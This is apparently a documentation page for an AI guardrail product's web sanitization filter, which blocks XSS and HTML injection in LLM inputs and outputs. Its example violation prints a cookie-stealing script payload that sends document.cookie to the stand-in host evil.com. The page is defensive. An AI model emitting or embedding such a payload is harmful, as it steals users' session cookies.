Nyraxis AI

Web Sanitization

Detects XSS, HTML injection, script tags, event handlers, and data URI attacks.

Web Sanitization

Web Sanitization detects cross-site scripting and HTML injection payloads in LLM inputs and outputs. When model responses are rendered in web interfaces, malicious scripts can execute in users' browsers. This provider blocks these payloads before they reach the frontend.

What it detects

  • Cross-site scripting (XSS) payloads
  • HTML injection and tag manipulation
  • Script tags (<script>, <iframe>)
  • Event handler injection (onload, onerror, onclick)
  • Data URI schemes with embedded scripts
  • SVG-based script execution
  • CSS expression injection

Configuration

{
  "policy_type": "web_sanitization",
  "mode": "blocking",
  "config": {}
}

No configuration needed — all web attack patterns are detected by default.

Example violation

{
  "policy_type": "web_sanitization",
  "severity": "high",
  "description": "XSS payload detected in model output",
  "details": {
    "attack_type": "xss",
    "payload_fragment": "<script>document.location='https://evil.com/steal?c='+document.cookie</script>"
  }
}

Best practices

  • Always enable on LLM output when responses are rendered as HTML
  • Combine with frontend sanitization libraries for defense in depth
  • Enable on input to prevent stored XSS via user-submitted content
  • Monitor for novel encoding bypasses and update detection rules accordingly

SQL Injection

Detects SQL injection patterns including DROP statements, UNION SELECT, tautologies, and stacked queries.

Topic Restriction

Enforce on-topic conversations by defining valid and invalid topic lists.

On this page

Web SanitizationWhat it detectsConfigurationExample violationBest practices